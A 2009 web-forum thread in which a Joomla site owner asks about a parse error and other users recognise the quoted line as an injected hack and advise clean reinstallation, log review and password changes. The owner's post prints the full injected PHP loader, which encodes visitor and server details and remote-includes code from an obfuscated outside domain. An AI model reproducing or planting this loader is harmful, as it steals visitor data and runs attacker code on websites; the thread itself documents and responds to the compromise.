Page 1 of 1

Parse error, syntax error

Posted: Fri Jun 26, 2009 3:06 pm
by vlastanovak
Hi guys,

I've not had any problems in the past and my site has been operational for months - I also haven't made any changes to my site in weeks.. BUT all of a sudden I am getting the following error message when trying to access my Joomla installation;

Code: Select all

Parse error: syntax error, unexpected '"', expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/ausnzcla/public_html/libraries/joomla/environment/uri.php on line 741
So I have isolated the line and the line is;

Code: Select all

$regex = "<^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>";
Does anyone have any idea where the error is?

SITE URL:ausnzclancentral . com See next post!!

Thanks.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 7:51 pm
by icesolid
Please re-post this with

Code: Select all

so I can read your code better.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 8:00 pm
by McInfo
WARNING :!: Do not run the script posted above and do not click on the link.

You have been hacked! The script is attempting to send your server variables to a Russian site, behgazzazbzefa.users.phpinclude.ru. Fortunately, the hacker was sloppy and edited the script in a way that causes a parse error, so it is possible that the edited script has never run and none of your users' IP addresses have been sent to the hacker's site. Unfortunately, you have a security hole that allowed the hacker to change your files.

Reinstall Joomla or restore uri.php by replacing it with a clean copy. Download Joomla here. Save the hacked copy for forensic evidence. Find the security hole.

Edit: This post was recovered from search engine cache.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 10:02 pm
by Eric!
That's a strange place in the code to put in a hack (source in link).
http://api.joomla.org/__filesource/fsou ... i.php.html

I would assume you might have other hidden hacks in your site as well.

One hole in joomla itself is a serious admin password hack in 1.5.0 and fixed recently in 1.5.6.
http://www.website-ideas.co.uk/2009/02/ ... joomla-15/

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 10:36 pm
by vlastanovak
So what would you advise I do? Can I re-install Joomla without losing my DB data or template?

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 10:52 pm
by McInfo
Your database should not be affected by reinstalling the scripts, but make a backup just in case. I have not worked with Joomla, so I don't know how its installer operates (I'm assuming it has one).

You should be able to make a copy-backup of your template and put it back in the templates folder after reinstalling Joomla. However, your template files may have also been compromised by the attack. So, if you can, install a clean copy of the template.

Edit: This post was recovered from search engine cache.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 11:10 pm
by Eric!
Joomla may not have been how they got in either. Check the file date on uri.php and look for other files with similar change/mod times...assuming the hacker was sloppy. Also check your raw log files for suspicious access to your site. Change all your passwords too. If your database had unencrypted passwords you need to get your users to change them as the database could have been copied.

It wouldn't hurt to notify your host of the details as they are sometimes willing to help analize and monitor your account. Sometimes attacks can come from users sharing the host server with you and they found a way into your files.